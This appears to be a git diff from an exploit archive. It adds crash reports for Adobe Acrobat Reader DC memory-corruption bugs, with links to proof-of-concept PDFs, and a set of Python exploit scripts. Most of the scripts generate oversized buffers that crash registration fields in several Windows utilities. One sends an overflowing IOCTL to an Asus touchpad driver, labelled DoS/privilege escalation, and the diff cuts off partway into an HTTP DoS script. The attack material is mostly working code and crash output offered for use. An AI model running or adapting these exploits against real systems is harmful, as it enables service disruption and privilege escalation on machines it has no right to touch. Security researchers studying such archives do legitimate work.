+1d 050fe0ac 0ebd994f 013e06ea 14ed7a00 050fe19c AcroRd32!DllCanUnloadNow+0x190bce
+1e 050fe0f4 0ebd97d3 050fe110 013e077e 050fe4cc AcroRd32!DllCanUnloadNow+0x19098f
+1f 050fe160 0ebd9607 050fe19c 148c73c0 406e5380 AcroRd32!DllCanUnloadNow+0x190813
+20 050fe1c0 0ebd7e7d 148c73c0 0ebdad20 050fe4cc AcroRd32!DllCanUnloadNow+0x190647
+21 050fe2c0 0ebd78d2 050fe4cc 013e0512 16bd8918 AcroRd32!DllCanUnloadNow+0x18eebd
+22 050fe30c 0ebd6d6d 050fe4cc 050fe4d4 013e0396 AcroRd32!DllCanUnloadNow+0x18e912
+23 050fe588 0ebd6b7e 00000002 174dc6da 013e03fa AcroRd32!DllCanUnloadNow+0x18ddad
+24 050fe5e4 0eb9628a 00000002 174dc6da 013e0e82 AcroRd32!DllCanUnloadNow+0x18dbbe
+25 050fe89c 0eb95168 13f5d0b0 050fe930 050fe980 AcroRd32!DllCanUnloadNow+0x14d2ca
+26 050fe9a0 0eb94375 13f5d0b0 050fead0 00000000 AcroRd32!DllCanUnloadNow+0x14c1a8
+27 050feaf4 0eb934ba 13f5d0b0 050febf8 00000000 AcroRd32!DllCanUnloadNow+0x14b3b5
+28 050feb54 0eb9334d 13f5d0b0 050febf8 00000000 AcroRd32!DllCanUnloadNow+0x14a4fa
+29 050feb74 0eb91f3c 13f5d0b0 050febf8 00000000 AcroRd32!DllCanUnloadNow+0x14a38d
+2a 050fec2c 0eb91962 00000001 00000000 013e0a9a AcroRd32!DllCanUnloadNow+0x148f7c
+2b 050fec84 0eb9177a 14743838 00000001 013e0af6 AcroRd32!DllCanUnloadNow+0x1489a2
+2c 050fece8 0eb914ff 050feddc 013e0be2 173039e0 AcroRd32!DllCanUnloadNow+0x1487ba
+2d 050fedfc 0ea566ec 173039e0 0ea56610 00000000 AcroRd32!DllCanUnloadNow+0x14853f
+2e 050fee14 0ea5645f 0000000f 00000000 00000000 AcroRd32!DllCanUnloadNow+0xd72c
+2f 050fee30 7460e0bb 012d017c 0000000f 00000000 AcroRd32!DllCanUnloadNow+0xd49f
+30 050fee5c 74618849 0ea563a0 012d017c 0000000f USER32!_InternalCallWinProc+0x2b
+31 050fee80 7461b145 0000000f 00000000 00000000 USER32!InternalCallWinProc+0x20
+32 050fef50 74608503 0ea563a0 00000000 0000000f USER32!UserCallWinProcCheckWow+0x1be
+33 050fefb8 74608aa0 0d640350 00000000 0000000f USER32!DispatchClientMessage+0x1b3
+34 050ff000 77291a6d 050ff01c 00000020 050ff080 USER32!__fnDWORD+0x50
+35 050ff038 76e92d3c 746091ee 050ff0d0 fc29c28c ntdll!KiUserCallbackDispatcher+0x4d
+36 050ff03c 746091ee 050ff0d0 fc29c28c 0ce80b78 win32u!NtUserDispatchMessage+0xc
+37 050ff090 74608c20 f926321c 050ff0b4 0ea6da8b USER32!DispatchMessageWorker+0x5be
+38 050ff09c 0ea6da8b 050ff0d0 0ce80b78 0ce80b78 USER32!DispatchMessageW+0x10
+39 050ff0b4 0ea6d81e 050ff0d0 013e1736 0ce80b78 AcroRd32!DllCanUnloadNow+0x24acb
+3a 050ff128 0ea6d6b4 013e177e 0ce80b78 00000000 AcroRd32!DllCanUnloadNow+0x2485e
+3b 050ff160 0e9fc556 013e17ce 0ce69870 00000000 AcroRd32!DllCanUnloadNow+0x246f4
+3c 050ff1d0 0e9fbf81 0e9d0000 00af0000 0ce69870 AcroRd32!AcroWinMainSandbox+0x756
+3d 050ff5f0 00af783d 0e9d0000 00af0000 0ce69870 AcroRd32!AcroWinMainSandbox+0x181
+3e 050ff9bc 00bffd2a 00af0000 00000000 0c032f0a AcroRd32_exe+0x783d
+3f 050ffa08 73cf8674 04f17000 73cf8650 f10c3998 AcroRd32_exe!AcroRd32IsBrokerProcess+0x9940a
+40 050ffa1c 77285e17 04f17000 af8342f3 00000000 KERNEL32!BaseThreadInitThunk+0x24
+41 050ffa64 77285de7 ffffffff 772aada9 00000000 ntdll!__RtlUserThreadStart+0x2f
+42 050ffa74 00000000 00af1390 04f17000 00000000 ntdll!_RtlUserThreadStart+0x1b
+
+0:000> !heap -p -a eax
+    address fffd6880 found in
+    _HEAP @ c030000
+      HEAP_ENTRY Size Prev Flags    UserPtr UserSize - state
+        ffe1a018 37a00 0000  [00]   ffe1a040    1bc858 - (busy VirtualAlloc)
+        66d6c27a verifier!AVrfpDphNormalHeapAllocate+0x000000ba
+        66d6a9fa verifier!AVrfDebugPageHeapAllocate+0x0000036a
+        77304b26 ntdll!RtlDebugAllocateHeap+0x0000003c
+        7725e3e6 ntdll!RtlpAllocateHeap+0x000000f6
+        7725cfb7 ntdll!RtlpAllocateHeapInternal+0x000002b7
+        7725ccee ntdll!RtlAllocateHeap+0x0000003e
+        66e5aa2f vrfcore!VfCoreRtlAllocateHeap+0x0000001f
+        74a2f1f6 ucrtbase!_malloc_base+0x00000026
+        e9ffcd9 AcroRd32!AcroWinMainSandbox+0x00003ed9
+        64468602 JP2KLib!JP2KTileGeometryRegionIsTile+0x00000182
+        64461432 JP2KLib!JP2KCopyRect+0x0001c232
+        644616dd JP2KLib!JP2KCopyRect+0x0001c4dd
+        644686c2 JP2KLib!JP2KTileGeometryRegionIsTile+0x00000242
+        6445ced4 JP2KLib!JP2KCopyRect+0x00017cd4
+        6445cfea JP2KLib!JP2KCopyRect+0x00017dea
+        6445b4ff JP2KLib!JP2KCopyRect+0x000162ff
+        6445898e JP2KLib!JP2KCopyRect+0x0001378e
+        6444d2af JP2KLib!JP2KCopyRect+0x000080af
+        6444d956 JP2KLib!JP2KCopyRect+0x00008756
+        6444dc90 JP2KLib!JP2KCopyRect+0x00008a90
+        64465e4a JP2KLib!JP2KImageDecodeTileInterleaved+0x0000002a
+        f07e12e AcroRd32!AX_PDXlateToHostEx+0x003200de
+        f04701b AcroRd32!AX_PDXlateToHostEx+0x002e8fcb
+        ef5ae8d AcroRd32!AX_PDXlateToHostEx+0x001fce3d
+        645ada8c AGM!AGMGetVersion+0x00016e3c
+        645ae053 AGM!AGMGetVersion+0x00017403
+        6484fb4c AGM!AGMGetVersion+0x002b8efc
+        64529a32 AGM!AGMInitialize+0x00040c02
+        645275d6 AGM!AGMInitialize+0x0003e7a6
+        64524133 AGM!AGMInitialize+0x0003b303
+        64522370 AGM!AGMInitialize+0x00039540
+        64520dec AGM!AGMInitialize+0x00037fbc
+--- cut ---
+
+Notes:
+
+- Reproduces on Adobe Acrobat Reader DC (2019.012.20035) on Windows 10, with and without PageHeap enabled.
+
+- The crash occurs immediately after opening the PDF document, and is caused by attempting to write data outside of a heap-based buffer.
+
+- Attached samples: poc.pdf (crashing file), original.pdf (original file).
+
+- We have minimized the difference between the original and mutated files down to a single byte inside of a binary JP2 image stream. The mutated byte is at offset 0x264a67 and was changed from 0x00 to 0xFE.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47277.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47278.txt b/exploits/windows/dos/47278.txt
new file mode 100644
index 000000000..2b1de341b
--- /dev/null
+++ b/exploits/windows/dos/47278.txt
@@ -0,0 +1,86 @@
+We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file:
+
+--- cut ---
+(4970.179c): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=c0c0c0a0 ebx=00000000 ecx=c0c0c000 edx=c0c0c0a0 esi=66d6aa60 edi=00000000
+eip=66d68718 esp=005bb01c ebp=005bb068 iopl=0         nv up ei ng nz na pe nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210286
+verifier!AVrfpDphFindBusyMemoryNoCheck+0xb8:
+66d68718 813abbbbcdab    cmp     dword ptr [edx],0ABCDBBBBh ds:002b:c0c0c0a0=????????
+
+0:000> kb
+ # ChildEBP RetAddr  Args to Child              
+00 005bb068 66d68835 009f1000 c0c0c0c0 00000000 verifier!AVrfpDphFindBusyMemoryNoCheck+0xb8
+01 005bb08c 66d68ab0 009f1000 c0c0c0c0 005bb124 verifier!AVrfpDphFindBusyMemory+0x15
+02 005bb0a8 66d6aaf0 009f1000 c0c0c0c0 00001000 verifier!AVrfpDphFindBusyMemoryAndRemoveFromBusyList+0x20
+03 005bb0c4 77305359 009f0000 01000002 c0c0c0c0 verifier!AVrfDebugPageHeapFree+0x90
+04 005bb134 7725ad86 c0c0c0c0 131a284b 00000000 ntdll!RtlDebugFreeHeap+0x3c
+05 005bb290 7725ac3d 00000000 c0c0c0c0 005bb630 ntdll!RtlpFreeHeap+0xd6
+06 005bb2e0 66e5aad0 009f0000 00000000 c0c0c0c0 ntdll!RtlFreeHeap+0x7cd
+07 005bb2fc 74a2db1b 009f0000 00000000 c0c0c0c0 vrfcore!VfCoreRtlFreeHeap+0x20
+08 005bb310 74a2dae8 c0c0c0c0 00000000 005bb330 ucrtbase!_free_base+0x1b
+09 005bb320 12192849 c0c0c0c0 723baff0 005bc4cc ucrtbase!free+0x18
+WARNING: Stack unwind information not available. Following frames may be wrong.
+0a 005bb330 1282c991 c0c0c0c0 723baff0 12840782 AcroRd32!AcroWinMainSandbox+0x6a49
+0b 005bc4cc 1283fa3b 726faf88 00000001 6d4befe8 AcroRd32!AX_PDXlateToHostEx+0x33e941
+0c 005bc504 1283209f 5f3b4f54 5f3b4f54 7c2fcfb8 AcroRd32!CTJPEGTiledContentWriter::operator=+0x21ab
+0d 005bc518 12825007 7c2fcfb8 00000044 52842f80 AcroRd32!AX_PDXlateToHostEx+0x34404f
+0e 005bc5cc 122257c9 5f3b4f54 6e87cfb0 12225730 AcroRd32!AX_PDXlateToHostEx+0x336fb7
+0f 005bc5f0 122256c3 57050fd8 00000001 00000028 AcroRd32!DllCanUnloadNow+0x4c809
+10 005bc610 1267215a 005bc634 57050fd8 00000028 AcroRd32!DllCanUnloadNow+0x4c703
+11 005bc654 1235a3a8 c0010000 0000000c 57050fd8 AcroRd32!AX_PDXlateToHostEx+0x18410a
+12 005bc9a8 123598e6 005bca04 7333ca98 c9eeee9e AcroRd32!DllCanUnloadNow+0x1813e8
+13 005bc9e0 123597c1 005bca04 7333ca98 005bca70 AcroRd32!DllCanUnloadNow+0x180926
+14 005bca4c 12358788 c0010000 0000000c 7333ca98 AcroRd32!DllCanUnloadNow+0x180801
+15 005bceac 12355cd7 005bd1b0 5eb4e5ac c0010000 AcroRd32!DllCanUnloadNow+0x17f7c8
+16 005be68c 12355955 5eb4e5ac c0010000 0000000c AcroRd32!DllCanUnloadNow+0x17cd17
+17 005be75c 123393ed c9eecf42 78356f78 00000000 AcroRd32!DllCanUnloadNow+0x17c995
+18 005be83c 123381e8 00000001 00000000 00000000 AcroRd32!DllCanUnloadNow+0x16042d
+19 005be888 1232b383 78356f78 00000000 00000000 AcroRd32!DllCanUnloadNow+0x15f228
+1a 005be9fc 1232ac97 17822dbc 00000001 7f976ef8 AcroRd32!DllCanUnloadNow+0x1523c3
+1b 005bea64 12328590 c9eecd9a 735a5e74 7f976ef8 AcroRd32!DllCanUnloadNow+0x151cd7
+1c 005beae4 1232825a 7f976ef8 7302cf40 735a5e44 AcroRd32!DllCanUnloadNow+0x14f5d0
+1d 005beb20 123a6099 7f976ef8 7302cf40 735a5e44 AcroRd32!DllCanUnloadNow+0x14f29a
+1e 005bebf8 123a57f9 6a53efc8 00000000 7302cf40 AcroRd32!CTJPEGDecoderRelease+0x2b209
+1f 005bec38 123a5717 6a53efc8 00000000 7302cf40 AcroRd32!CTJPEGDecoderRelease+0x2a969
+20 005bec70 123a5669 00000000 7302cf40 005bedf0 AcroRd32!CTJPEGDecoderRelease+0x2a887
+21 005bec8c 123a51ec 7302cf40 005bedf0 005bee08 AcroRd32!CTJPEGDecoderRelease+0x2a7d9
+22 005bee54 123a4a8c 00000002 00000000 ffffffff AcroRd32!CTJPEGDecoderRelease+0x2a35c
+23 005bf074 123a47d4 123a47a0 5f558f90 005bf0cc AcroRd32!CTJPEGDecoderRelease+0x29bfc
+24 005bf084 121fed79 6abbb1b8 c9eed7b2 5dd08ff8 AcroRd32!CTJPEGDecoderRelease+0x29944
+25 005bf0cc 121fe83d 000004df c9eed642 15c34fd8 AcroRd32!DllCanUnloadNow+0x25db9
+26 005bf13c 121fe5d4 c9eed61a 15c34fd8 121fe560 AcroRd32!DllCanUnloadNow+0x2587d
+27 005bf164 12194709 000004d3 00000000 12194270 AcroRd32!DllCanUnloadNow+0x25614
+28 005bf180 7460e0bb 01340c64 00000113 000004d3 AcroRd32!AcroWinMainSandbox+0x8909
+29 005bf1ac 74618849 12194270 01340c64 00000113 USER32!_InternalCallWinProc+0x2b
+2a 005bf1d0 7461b145 00000113 000004d3 00000000 USER32!InternalCallWinProc+0x20
+2b 005bf2a0 746090dc 12194270 00000000 00000113 USER32!UserCallWinProcCheckWow+0x1be
+2c 005bf30c 74608c20 7b28fd14 005bf330 121fda8b USER32!DispatchMessageWorker+0x4ac
+2d 005bf318 121fda8b 005bf34c 15b4fdd8 15b4fdd8 USER32!DispatchMessageW+0x10
+2e 005bf330 121fd81e 005bf34c c9eed4da 15b4fdd8 AcroRd32!DllCanUnloadNow+0x24acb
+2f 005bf3a4 121fd6b4 c9eed4a2 15b4fdd8 00000000 AcroRd32!DllCanUnloadNow+0x2485e
+30 005bf3dc 1218c556 c9eed332 1489eff8 00000000 AcroRd32!DllCanUnloadNow+0x246f4
+31 005bf44c 1218bf81 12160000 00af0000 1489eff8 AcroRd32!AcroWinMainSandbox+0x756
+32 005bf86c 00af783d 12160000 00af0000 1489eff8 AcroRd32!AcroWinMainSandbox+0x181
+33 005bfc38 00bffd2a 00af0000 00000000 00a0b3ba AcroRd32_exe+0x783d
+34 005bfc84 73cf8674 007e2000 73cf8650 386b17d8 AcroRd32_exe!AcroRd32IsBrokerProcess+0x9940a
+35 005bfc98 77285e17 007e2000 131a663b 00000000 KERNEL32!BaseThreadInitThunk+0x24
+36 005bfce0 77285de7 ffffffff 772aada6 00000000 ntdll!__RtlUserThreadStart+0x2f
+37 005bfcf0 00000000 00af1390 007e2000 00000000 ntdll!_RtlUserThreadStart+0x1b
+--- cut ---
+
+Notes:
+
+- Reproduces on Adobe Acrobat Reader DC (2019.012.20035) on Windows 10, with and without PageHeap enabled, but most consistently with PageHeap (thanks to the allocation marker bytes).
+
+- The crash occurs immediately after opening the PDF document, and is caused by passing an uninitialized value from the heap as an argument to the free() function. With PageHeap enabled, all new allocations are filled with the 0xc0c0c0... marker, which is visible in the crash log above.
+
+- Attached samples: poc1.pdf and poc2.pdf (crashing files), original.pdf (original file).
+
+- We have minimized the difference between the original and mutated files down to a single byte at offset 0x3bc, which appears to reside inside a JBIG2Globals object. It was modified from 0x00 to 0xB5 (in poc1.pdf) and to 0x35 (in poc2.pdf).
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47278.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47279.txt b/exploits/windows/dos/47279.txt
new file mode 100644
index 000000000..2c1dc133d
--- /dev/null
+++ b/exploits/windows/dos/47279.txt
@@ -0,0 +1,117 @@
+We have observed the following crash in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file:
+
+--- cut ---
+=======================================
+VERIFIER STOP 00000007: pid 0x2C1C: Heap block already freed. 
+
+	0C441000 : Heap handle for the heap owning the block.
+	147E6638 : Heap block being freed again.
+	00000010 : Size of the heap block.
+	00000000 : Not used
+
+
+=======================================
+This verifier stop is not continuable. Process will be terminated 
+when you use the `go' debugger command.
+
+=======================================
+
+(2c1c.491c): Break instruction exception - code 80000003 (first chance)
+eax=66e603a0 ebx=00000000 ecx=000001a1 edx=0536c661 esi=66e5dd88 edi=0c441000
+eip=66e53ae6 esp=0536c948 ebp=0536cb5c iopl=0         nv up ei pl nz na po nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
+vrfcore!VerifierStopMessageEx+0x5b6:
+66e53ae6 cc              int     3
+
+0:000> kb
+ # ChildEBP RetAddr  Args to Child              
+00 0536cb5c 66e58038 66e5d258 00000007 0c441000 vrfcore!VerifierStopMessageEx+0x5b6
+01 0536cb80 66d6da5e 00000007 66d61cbc 0c441000 vrfcore!VfCoreRedirectedStopMessage+0x88
+02 0536cbd8 66d6b8a8 00000007 66d61cbc 0c441000 verifier!VerifierStopMessage+0x8e
+03 0536cc44 66d6bdea 0c441000 00000004 147e6638 verifier!AVrfpDphReportCorruptedBlock+0x1b8
+04 0536cca0 66d6c302 0c441000 147e6638 00000004 verifier!AVrfpDphCheckNormalHeapBlock+0x11a
+05 0536ccc0 66d6ab43 0c441000 0c640000 01000002 verifier!AVrfpDphNormalHeapFree+0x22
+06 0536cce4 77305359 0c440000 01000002 147e6638 verifier!AVrfDebugPageHeapFree+0xe3
+07 0536cd54 7725ad86 147e6638 ab70558b 00000000 ntdll!RtlDebugFreeHeap+0x3c
+08 0536ceb0 7725ac3d 00000000 147e6638 00000000 ntdll!RtlpFreeHeap+0xd6
+09 0536cf04 66e5aad0 0c440000 00000000 147e6638 ntdll!RtlFreeHeap+0x7cd
+0a 0536cf20 74a2db1b 0c440000 00000000 147e6638 vrfcore!VfCoreRtlFreeHeap+0x20
+0b 0536cf34 74a2dae8 147e6638 00000000 0536cf54 ucrtbase!_free_base+0x1b
+0c 0536cf44 0f012849 147e6638 16fd32f8 0536d068 ucrtbase!free+0x18
+WARNING: Stack unwind information not available. Following frames may be wrong.
+0d 0536cf54 0f6d6441 147e6638 31577737 0536d0b8 AcroRd32!AcroWinMainSandbox+0x6a49
+0e 0536d068 0f6c20a4 0536d0d8 00000001 00000b20 AcroRd32!CTJPEGTiledContentWriter::operator=+0x18bb1
+0f 0536d230 0f6bf15d 00000000 00000000 00000000 AcroRd32!CTJPEGTiledContentWriter::operator=+0x4814
+10 0536d264 0f6b209f 1771f6b4 1771f6b4 194f9078 AcroRd32!CTJPEGTiledContentWriter::operator=+0x18cd
+11 0536d278 0f6a5007 194f9078 000033f8 2037a088 AcroRd32!AX_PDXlateToHostEx+0x34404f
+12 0536d32c 0f0a57c9 1771f6b4 19053d28 0f0a5730 AcroRd32!AX_PDXlateToHostEx+0x336fb7
+13 0536d350 0f0a56c3 1cb80970 00000001 0013d690 AcroRd32!DllCanUnloadNow+0x4c809
+14 0536d370 0f02e7e1 0536d390 1cb80970 0013d690 AcroRd32!DllCanUnloadNow+0x4c703
+15 0536d398 0f02e78d 1cb80970 00000001 0013d690 AcroRd32!AcroWinMainSandbox+0x229e1
+16 0536d3ac 0f0e8a5b 1cb80970 00000001 0013d690 AcroRd32!AcroWinMainSandbox+0x2298d
+17 0536d3c8 0f1f4315 1cb80970 00000001 0013d690 AcroRd32!DllCanUnloadNow+0x8fa9b
+18 0536d42c 0f6568a8 00000000 00000e44 205378ac AcroRd32!CTJPEGDecoderHasMoreTiles+0x1a15
+19 0536d4ac 0f56ae8d 0536d4cc 0536d4dc 315773af AcroRd32!AX_PDXlateToHostEx+0x2e8858
+1a 0536d4f0 10d5da8c 17b908d0 0536d55c bb3e57b9 AcroRd32!AX_PDXlateToHostEx+0x1fce3d
+1b 0536d56c 10d5e053 0536d5b8 bb3e5771 00000000 AGM!AGMGetVersion+0x16e3c
+1c 0536d5a4 10fffb4c 193d706c 0536d5b8 fffffff9 AGM!AGMGetVersion+0x17403
+1d 0536d5bc 10cd9a32 0536d650 bb3e5855 17c76ff8 AGM!AGMGetVersion+0x2b8efc
+1e 0536da80 10cd75d6 0536df90 17c76ff8 0536df04 AGM!AGMInitialize+0x40c02
+1f 0536df24 10cd4133 0536df90 17c76ff8 0536e124 AGM!AGMInitialize+0x3e7a6
+20 0536e144 10cd2370 19891678 18f911e8 17c616f8 AGM!AGMInitialize+0x3b303
+21 0536e320 10cd0dec 19891678 18f911e8 bb3e61b9 AGM!AGMInitialize+0x39540
+22 0536e36c 10cfffbf 19891678 18f911e8 17150de0 AGM!AGMInitialize+0x37fbc
+23 0536e398 10cffb7f 18f911e8 bb3e66d1 17150de0 AGM!AGMInitialize+0x6718f
+24 00000000 00000000 00000000 00000000 00000000 AGM!AGMInitialize+0x66d4f
+
+0:000> !heap -p -a 147E6638 
+    address 147e6638 found in
+    _HEAP @ c640000
+      HEAP_ENTRY Size Prev Flags    UserPtr UserSize - state
+        147e6610 0009 0000  [00]   147e6638    00010 - (free DelayedFree)
+        66d6c396 verifier!AVrfpDphNormalHeapFree+0x000000b6
+        66d6ab43 verifier!AVrfDebugPageHeapFree+0x000000e3
+        77305359 ntdll!RtlDebugFreeHeap+0x0000003c
+        7725ad86 ntdll!RtlpFreeHeap+0x000000d6
+        7725ac3d ntdll!RtlFreeHeap+0x000007cd
+        66e5aad0 vrfcore!VfCoreRtlFreeHeap+0x00000020
+        74a2db1b ucrtbase!_free_base+0x0000001b
+        74a2dae8 ucrtbase!free+0x00000018
+        f012849 AcroRd32!AcroWinMainSandbox+0x00006a49
+        f6d6430 AcroRd32!CTJPEGTiledContentWriter::operator=+0x00018ba0
+        f6c20a4 AcroRd32!CTJPEGTiledContentWriter::operator=+0x00004814
+        f6bf15d AcroRd32!CTJPEGTiledContentWriter::operator=+0x000018cd
+        f6b209f AcroRd32!AX_PDXlateToHostEx+0x0034404f
+        f6a5007 AcroRd32!AX_PDXlateToHostEx+0x00336fb7
+        f0a57c9 AcroRd32!DllCanUnloadNow+0x0004c809
+        f0a56c3 AcroRd32!DllCanUnloadNow+0x0004c703
+        f02e7e1 AcroRd32!AcroWinMainSandbox+0x000229e1
+        f02e78d AcroRd32!AcroWinMainSandbox+0x0002298d
+        f0e8a5b AcroRd32!DllCanUnloadNow+0x0008fa9b
+        f1f4315 AcroRd32!CTJPEGDecoderHasMoreTiles+0x00001a15
+        f6568a8 AcroRd32!AX_PDXlateToHostEx+0x002e8858
+        f56ae8d AcroRd32!AX_PDXlateToHostEx+0x001fce3d
+        10d5da8c AGM!AGMGetVersion+0x00016e3c
+        10d5e053 AGM!AGMGetVersion+0x00017403
+        10fffb4c AGM!AGMGetVersion+0x002b8efc
+        10cd9a32 AGM!AGMInitialize+0x00040c02
+        10cd75d6 AGM!AGMInitialize+0x0003e7a6
+        10cd4133 AGM!AGMInitialize+0x0003b303
+        10cd2370 AGM!AGMInitialize+0x00039540
+        10cd0dec AGM!AGMInitialize+0x00037fbc
+        10cfffbf AGM!AGMInitialize+0x0006718f
+--- cut ---
+
+Notes:
+
+- Reproduces on Adobe Acrobat Reader DC (2019.012.20035) on Windows 10, with the PageHeap option enabled in Application Verifier.
+
+- The crash occurs immediately after opening the PDF document.
+
+- Attached samples: poc.pdf (crashing file), original.pdf (original file).
+
+- We have minimized the difference between the original and mutated files down to a single byte at offset 0x172b4, which appears to reside inside a binary JP2 image stream. It was modified from 0x1C to 0xFF.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47279.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47285.py b/exploits/windows/dos/47285.py
new file mode 100755
index 000000000..780348c04
--- /dev/null
+++ b/exploits/windows/dos/47285.py
@@ -0,0 +1,29 @@
+# Exploit Title: RAR Password Recovery v1.80 Denial of Service Exploit
+# Date: 16.08.2019
+# Vendor Homepage:https://www.top-password.com/
+# Software Link:  https://www.top-password.com/download/RARPRSetup.exe
+# Exploit Author: Achilles
+# Tested Version: v1.80
+# Tested on: Windows 7 x64
+#            Windows XP SP3
+
+
+# 1.- Run python code :RAR Password Recovery.py
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open RAR Password Recovery and Click 'Register'
+# 4.- Paste the content of EVIL.txt into the Field: 'User Name and Registration Code'
+# 5.- Click 'OK' and you will see a crash.
+
+
+
+#!/usr/bin/env python
+buffer = "\x41" * 6000
+
+try:
+	f=open("Evil.txt","w")
+	print "[+] Creating %s bytes evil payload.." %len(buffer)
+	f.write(buffer)
+	f.close()
+	print "[+] File created!"
+except:
+	print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/dos/47309.py b/exploits/windows/dos/47309.py
new file mode 100755
index 000000000..e9b165dca
--- /dev/null
+++ b/exploits/windows/dos/47309.py
@@ -0,0 +1,28 @@
+#Exploit Title: Outlook Password Recovery v2.10 Denial of Service Exploit
+# Date: 16.08.2019
+# Vendor Homepage:https://www.top-password.com/
+# Software Link: https://www.top-password.com/outlook-password-recovery.html
+# Exploit Author: Velayutham Selvaraj & Praveen Thiyagarayam (TwinTech Solutions)
+# Tested Version: v2.10
+# Tested on: Windows 7 x64
+# Windows XP SP3
+
+
+# 1.- Run python code :Outlook Password Recovery.py
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open OUTLOOK Password Recovery and Click 'EnterKey'
+# 4.- Paste the content of EVIL.txt into the Field: 'User Name and
+Registration Code'
+# 5.- Click 'OK' and you will see a crash.
+
+#!/usr/bin/env python
+buffer = "\x41" * 6000
+
+try:
+f=open("Evil.txt","w")
+print "[+] Creating %s bytes evil payload.." %len(buffer)
+f.write(buffer)
+f.close()
+print "[+] File created!"
+except:
+print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/dos/47318.py b/exploits/windows/dos/47318.py
new file mode 100755
index 000000000..033ca8e82
--- /dev/null
+++ b/exploits/windows/dos/47318.py
@@ -0,0 +1,26 @@
+#Exploit Title: SQL Server Password Changer v1.90 Denial of Service Exploit
+# Date: 29.08.2019
+# Vendor Homepage:https://www.top-password.com/
+# Exploit Author: Velayutham Selvaraj & Praveen Thiyagarayam (TwinTech Solutions)
+# Tested Version: v2.10
+# Tested on: Windows 8 x64
+# Windows 7 x64
+
+
+# 1.- Run python code :Outlook Password Recovery.py
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open SQL Server Password Changer and Click 'EnterKey'
+# 4.- Paste the content of EVIL.txt into the Field: 'User Name and Registration Code'
+# 5.- Click 'OK' and you will see a crash.
+
+#!/usr/bin/env python
+buffer = "x41" * 6000
+
+try:
+f=open("Evil.txt","w")
+print "[+] Creating %s bytes evil payload.." %len(buffer)
+f.write(buffer)
+f.close()
+print "[+] File created!"
+except:
+print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/dos/47319.py b/exploits/windows/dos/47319.py
new file mode 100755
index 000000000..e2a832d72
--- /dev/null
+++ b/exploits/windows/dos/47319.py
@@ -0,0 +1,71 @@
+#!/usr/bin/python
+
+# SWAMI KARUPASAMI THUNAI
+
+ 
+
+print("""
+
+############################################################################
+###
+
+# Exploit Title:        Easy MP3 Downloader Denial of Service
+
+# Date:                 2019-08-29
+
+# Exploit Author:       Mohan Ravichandran & Snazzy Sanoj
+
+# Organization :        StrongBox IT
+
+# Vulnerable Software:  Easy MP3 Downloader
+
+# Version:              4.7.8.8
+
+# Software Link:
+https://download.cnet.com/Easy-MP3-Downloader/3000-2141_4-10860695.html
+
+# Tested On:            Windows 10
+
+#
+
+# Credit to Snazzy Sanoj & Meshach for discovering the Vulnerbility
+
+# Vulnerability Disclosure Date : 2019-08-29
+
+#
+
+# Manual steps to reproduce the vulnerability ... 
+
+#1.  Download and install the setup file
+
+#2.  Run this exploit code via python 2.7
+
+#3.  A file "exploit.txt" will be created
+
+#4.  Copy the contents of the file
+
+#5.  While launching the application select Enter SN
+
+#6.  Enter random string and press Ok
+
+#7.  Then select manual option
+
+#8.  Then Copy the contents of the exploit.txt and paste on the Unlock Code
+field
+
+#9.  Click Ok and voila ! :P Application crashes
+
+############################################################################
+###
+
+""")
+
+ 
+
+file = open("exploit.txt","wb")
+
+junk = "A" * 6000
+
+file.write(junk)
+
+file.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/47322.py b/exploits/windows/dos/47322.py
new file mode 100755
index 000000000..ec43bc71e
--- /dev/null
+++ b/exploits/windows/dos/47322.py
@@ -0,0 +1,24 @@
+#!/usr/bin/python
+# Exploit Title: Asus Precision TouchPad 11.0.0.25 - DoS/Privesc
+# Date: 29-08-2019
+# Exploit Author: Athanasios Tserpelis of Telspace Systems
+# Vendor Homepage: https://www.asus.com
+# Version: 11.0.0.25
+# Software Link : https://www.asus.com
+# Contact: services[@]telspace.co.za
+# Twitter: @telspacesystems (Greets to the Telspace Crew)
+# Tested on: Windows 10 RS5 x64
+# CVE: CVE-2019-10709
+
+from ctypes import * 
+kernel32 = windll.kernel32 
+ntdll = windll.ntdll 
+NULL = 0 
+hevDevice = kernel32.CreateFileA("\\\\.\\AsusTP", 0xC0000000, 0, None, 0x3, 0, None) 
+if not hevDevice or hevDevice == -1:
+    print "*** Couldn't get Device Driver handle."
+    sys.exit(0) 
+
+buf = "A"*12048 
+raw_input("Press Enter to Trigger Vuln") 
+kernel32.DeviceIoControl(hevDevice, 0x221408, buf, 0x1, buf, 0x1 , 0, NULL)
\ No newline at end of file
diff --git a/exploits/windows/dos/47328.py b/exploits/windows/dos/47328.py
new file mode 100755
index 000000000..dc64d2e8d
--- /dev/null
+++ b/exploits/windows/dos/47328.py
@@ -0,0 +1,28 @@
+# Exploit Title: VX Search Enterprise v10.4.16 DoS
+# Google Dork: N/A
+# Date: 17.01.2018
+# Exploit Author: James Chamberlain [chumb0]
+# Vendor Homepage: http://www.vxsearch.com/downloads.html
+# Software Link: http://www.vxsearch.com/setups/vxsearchent_setup_v10.4.16.exe
+# Version: v10.4.16
+# Tested on: Windows 7 Home x86
+# CVE : N/A
+
+# Have been unable to overwrite SEH/EIP, but the crash serves as an unauthenticated DoS.
+
+# Replication - Large buffer sent in the majority of Request Headers. PoC attached. Server needs http enabling (non default)
+
+ #!/usr/bin/python
+import socket
